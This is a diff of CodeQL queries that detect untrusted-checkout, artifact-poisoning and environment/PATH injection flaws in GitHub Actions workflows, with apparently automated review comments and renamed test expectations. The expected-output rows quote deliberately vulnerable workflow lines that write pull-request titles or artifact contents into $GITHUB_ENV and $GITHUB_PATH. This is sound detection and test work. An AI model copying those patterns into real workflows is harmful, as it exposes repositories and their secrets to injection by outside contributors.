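Review bot: The new conjunct `check.getEnclosingJob().isExternallyTriggerable()` in UntrustedCheckoutTOCTOUCritical.ql is unconditional, so a mutable-ref checkout inside a composite action — which presumably has no enclosing job, given that the other queries in this commit special-case composite actions through `inPrivilegedCompositeAction` — can no longer be reported even when guarded by a `LabelControlCheck`, which the second hunk says does not depend on the triggering event. If that narrowing is intended, a comment stating that composite actions are out of scope for the TOCTOU queries would settle it; if not, restrict the gate to workflow jobs, e.g. `(not exists(check.getEnclosingJob()) or check.getEnclosingJob().isExternallyTriggerable()) and`. Stylistically the condition is phrased on `check` while every other line binds through `checkout`; because `check` is one of `checkout`'s `if` conditions they resolve to the same job, but `checkout.getEnclosingJob().isExternallyTriggerable()` makes that obvious. The `where` clause continues beyond both hunks.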
@@ -17,6 +17,8 @@ import codeql.actions.security.PoisonableSteps
 
 from ControlCheck check, MutableRefCheckoutStep checkout
 where
+  // the job can be triggered by an external user
+  check.getEnclosingJob().isExternallyTriggerable() and
   // the mutable checkout step is protected by an access check
   check = [checkout.getIf(), checkout.getEnclosingJob().getIf()] and
   // there are no evidences that the checked-out code can lead to arbitrary code execution
diff --git a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql
similarity index 64%
rename from ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql
rename to ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql
index 379babf35f82..a7d2518564de 100644
--- a/ql/src/Security/CWE-829/PrivilegedArtifactPoisoning.ql
+++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql
@@ -3,9 +3,9 @@
  * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps.
  * @kind path-problem
  * @problem.severity error
- * @precision high
+ * @precision very-high
  * @security-severity 9
- * @id actions/privileged-artifact-poisoning
+ * @id actions/artifact-poisoning/critical
  * @tags actions
  *   security
  *   external/cwe/cwe-829
@@ -18,10 +18,11 @@ import ArtifactPoisoningFlow::PathGraph
 from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink
 where
   ArtifactPoisoningFlow::flowPath(source, sink) and
-  exists(Job j |
-    j = sink.getNode().asExpr().getEnclosingJob() and
-    j.isPrivileged()
+  (
+    inPrivilegedCompositeAction(sink.getNode().asExpr())
+    or
+    inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr())
   )
 select sink.getNode(), source, sink,
-  "Potential privileged artifact poisoning in $@, which may be controlled by an external user.",
-  sink, sink.getNode().toString()
+  "Potential artifact poisoning in $@, which may be controlled by an external user.", sink,
+  sink.getNode().toString()
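Review bot: UntrustedCheckoutTOCTOUHigh.ql now carries the same two added lines as UntrustedCheckoutTOCTOUCritical.ql (`check.getEnclosingJob().isExternallyTriggerable() and` and its comment), and the same caveat applies: a mutable-ref checkout with no enclosing job drops out of this query entirely. Rather than duplicating the gate in both tiers, a predicate next to the `inPrivilegedExternallyTriggerableJob` helper the CWE-829 queries use (say one taking the `ControlCheck`) would keep the two TOCTOU queries in sync when the definition of "externally triggerable" changes. ArtifactPoisoningCritical.ql on this same line drops the word "privileged" from its message and becomes textually indistinguishable from ArtifactPoisoningMedium.ql's; the query id is not always visible to the alert consumer, so a distinguishing phrase is worth keeping. The TOCTOU `where` clause continues past the hunk.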
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql
similarity index 77%
rename from ql/src/Security/CWE-829/ArtifactPoisoning.ql
rename to ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql
index c26862960d15..a4fb958b7f96 100644
--- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql
+++ b/ql/src/Security/CWE-829/ArtifactPoisoningMedium.ql
@@ -5,7 +5,7 @@
  * @problem.severity warning
  * @precision high
  * @security-severity 5.0
- * @id actions/artifact-poisoning
+ * @id actions/artifact-poisoning/medium
  * @tags actions
  *   security
  *   external/cwe/cwe-829
@@ -19,12 +19,8 @@ from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sin
 where
   ArtifactPoisoningFlow::flowPath(source, sink) and
   (
-    exists(sink.getNode().asExpr().getEnclosingCompositeAction())
-    or
-    exists(Job j |
-      j = sink.getNode().asExpr().getEnclosingJob() and
-      not j.isPrivileged()
-    )
+    inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or
+    inNonPrivilegedJob(sink.getNode().asExpr())
   )
 select sink.getNode(), source, sink,
   "Potential artifact poisoning in $@, which may be controlled by an external user.", sink,
diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
similarity index 85%
rename from ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql
rename to ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
index 1181cd1e7559..0a597ee3fa48 100644
--- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutCritical.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql
@@ -5,9 +5,9 @@
  * that is able to push to the base repository and to access secrets.
  * @kind problem
  * @problem.severity error
- * @precision high
+ * @precision very-high
  * @security-severity 9.3
- * @id actions/privileged-untrusted-checkout/critical
+ * @id actions/untrusted-checkout/critical
  * @tags actions
  *   security
  *   external/cwe/cwe-829
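Review bot: ArtifactPoisoningMedium.ql keeps `@precision high` in its first hunk while CodeInjectionMedium.ql, which receives the identical `inNonPrivilegedCompositeAction(...) or inNonPrivilegedJob(...)` gate in this same commit, is lowered to `medium`. If the downgrade reflects the weaker non-privileged context rather than the flow configuration, the same reasoning applies here and the two metadata lines should agree; if artifact poisoning is genuinely more precise, a one-line comment above `@precision` saying why would stop the next person from "fixing" the mismatch. The same tier gap noted for code injection exists here: sinks in privileged jobs that are not externally triggerable fall between ArtifactPoisoningCritical.ql and this query if `inNonPrivilegedJob` is the plain negation of `isPrivileged()`, which I am inferring from its name since it is defined outside the diff.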
@@ -20,10 +20,14 @@ import codeql.actions.security.PoisonableSteps
 from LocalJob j, PRHeadCheckoutStep checkout
 where
   j = checkout.getEnclosingJob() and
-  j.isPrivileged() and
   j.getAStep() = checkout and
   checkout.getAFollowingStep() instanceof PoisonableStep and
   not exists(ControlCheck check |
     checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check
+  ) and
+  (
+    inPrivilegedCompositeAction(checkout)
+    or
+    inPrivilegedExternallyTriggerableJob(checkout)
   )
 select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow."
diff --git a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
similarity index 87%
rename from ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql
rename to ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
index bf2cf129fbf5..29a15accdf27 100644
--- a/ql/src/Security/CWE-829/PrivilegedUntrustedCheckoutHigh.ql
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql
@@ -7,7 +7,7 @@
  * @problem.severity warning
  * @precision medium
  * @security-severity 5.3
- * @id actions/privileged-untrusted-checkout/high
+ * @id actions/untrusted-checkout/high
  * @tags actions
  *   security
  *   external/cwe/cwe-829
@@ -20,10 +20,14 @@ import codeql.actions.security.PoisonableSteps
 from LocalJob j, PRHeadCheckoutStep checkout
 where
   j = checkout.getEnclosingJob() and
-  j.isPrivileged() and
   j.getAStep() = checkout and
   not checkout.getAFollowingStep() instanceof PoisonableStep and
   not exists(ControlCheck check |
     checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check
+  ) and
+  (
+    inPrivilegedCompositeAction(checkout)
+    or
+    inPrivilegedExternallyTriggerableJob(checkout)
   )
 select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow."
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql
new file mode 100644
index 000000000000..aa62a88935b2
--- /dev/null
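Review bot: In both UntrustedCheckoutCritical.ql and UntrustedCheckoutHigh.ql the new disjunct `inPrivilegedCompositeAction(checkout)` looks unreachable: the `from`/`where` still binds `LocalJob j` through `j = checkout.getEnclosingJob() and j.getAStep() = checkout`, so a checkout step inside a composite action can only match if it also has an enclosing `LocalJob`, which — judging by the sibling queries treating composite actions as a separate case — it presumably does not. If composite actions are meant to be covered, drop `LocalJob j` and the two `j` conjuncts (they are redundant with the `inPrivileged…` helpers, which take the step directly) and start from `from PRHeadCheckoutStep checkout`; if they are not, remove the disjunct so the query says what it does. Removing `j.isPrivileged()` and re-adding it via `inPrivilegedExternallyTriggerableJob(checkout)` also silently adds an externally-triggerable requirement that the `@description` in the preceding hunk does not mention; a sentence there ("…and the workflow can be triggered by an external user") would keep the docs honest.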
+++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql
@@ -0,0 +1,31 @@
+/**
+ * @name Checkout of untrusted code in trusted context
+ * @description Priveleged workflows have read/write access to the base repository and access to secrets.
+ * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment
+ * that is able to push to the base repository and to access secrets.
+ * @kind problem
+ * @problem.severity warning
+ * @precision medium
+ * @security-severity 5.0
+ * @id actions/untrusted-checkout/medium
+ * @tags actions
+ *   security
+ *   external/cwe/cwe-829
+ */
+
+import actions
+import codeql.actions.security.UntrustedCheckoutQuery
+import codeql.actions.security.PoisonableSteps
+
+from LocalJob j, PRHeadCheckoutStep checkout
+where
+  j = checkout.getEnclosingJob() and
+  j.getAStep() = checkout and
+  not exists(ControlCheck check |
+    checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check
+  ) and
+  (
+    inNonPrivilegedCompositeAction(checkout) or
+    inNonPrivilegedJob(checkout)
+  )
+select checkout, "Potential unsafe checkout of untrusted pull request on privileged workflow."
diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql
index 5f4218cacfe2..bedd03e2239e 100644
--- a/ql/test/library-tests/test.ql
+++ b/ql/test/library-tests/test.ql
@@ -1,5 +1,5 @@
 import codeql.actions.Ast
-import codeql.actions.Ast::Utils as Utils
+import codeql.actions.Helper
 import codeql.actions.Cfg as Cfg
 import codeql.actions.DataFlow
 import codeql.Locations
@@ -69,7 +69,7 @@ query string testNormalizeExpr(string s) {
       "github.event.pull_request.user['login']", "github.event.pull_request.user[\"login\"]",
       "github.event.pull_request['user']['login']", "foo['bar'] == baz"
     ] and
-  result = Utils::normalizeExpr(s)
+  result = normalizeExpr(s)
 }
 
 query predicate writeToGitHubEnv(string key, string value) {
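Review bot: UntrustedCheckoutMedium.ql is the non-privileged tier (`inNonPrivilegedCompositeAction(checkout) or inNonPrivilegedJob(checkout)`), yet its `select` message still reads `"Potential unsafe checkout of untrusted pull request on privileged workflow."` and its `@description` (with "Priveleged" misspelt) describes privileged workflows that can push to the base repository and read secrets; both are copied from the Critical/High variants and will mislead triage, since an alert from this query by construction did not come from a privileged context. Suggested line: `select checkout, "Potential unsafe checkout of untrusted pull request on non-privileged workflow."`, and a description that explains what running fork code in a non-privileged job can still affect rather than restating the privileged case. As in the Critical/High variants, binding `LocalJob j` via `j = checkout.getEnclosingJob()` presumably makes the composite-action disjunct unreachable, so either drop the job binding or drop the disjunct. The test.ql hunks on this line are test-only and need nothing.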
@@ -82,7 +82,7 @@ query predicate writeToGitHubEnv(string key, string value) { "echo 'sha2=$(> $GITHUB_ENV", "echo sha3=$(> $GITHUB_ENV", ] and - Utils::extractLineAssignment(t, "ENV", key, value) + extractLineAssignment(t, "ENV", key, value) ) } @@ -100,6 +100,6 @@ query predicate writeToGitHubOutput(string key, string value) { "echo sha5=$(> ${GITHUB_OUTPUT}", "echo sha6=$(> \"${GITHUB_OUTPUT}\"", ] and - Utils::extractLineAssignment(t, "OUTPUT", key, value) + extractLineAssignment(t, "OUTPUT", key, value) ) } diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref deleted file mode 100644 index ab36454942e0..000000000000 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/EnvPathInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected similarity index 71% rename from ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index af4b70d3a601..c6091f1fc239 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvPathInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected 
@@ -18,8 +18,8 @@ nodes | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths #select -| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential privileged PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref new file mode 100644 index 000000000000..80f72124fe45 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvPathInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-077/EnvPathInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref new file mode 100644 index 000000000000..165a3d20896b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-077/EnvPathInjectionMedium.ql 
diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref deleted file mode 100644 index dafc2b38fc46..000000000000 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.qlref +++ /dev/null @@ -1 +0,0 @@ -Security/CWE-077/EnvVarInjection.ql diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected similarity index 71% rename from ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected rename to ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 8c9d923bd35a..369085708a06 100644 --- a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -35,14 +35,14 @@ nodes | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | semmle.label | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | subpaths #select -| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n echo EOF\n} >> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\n echo "FOO=$TITLE"\nEOF\n | -| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential privileged environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | +| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | +| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
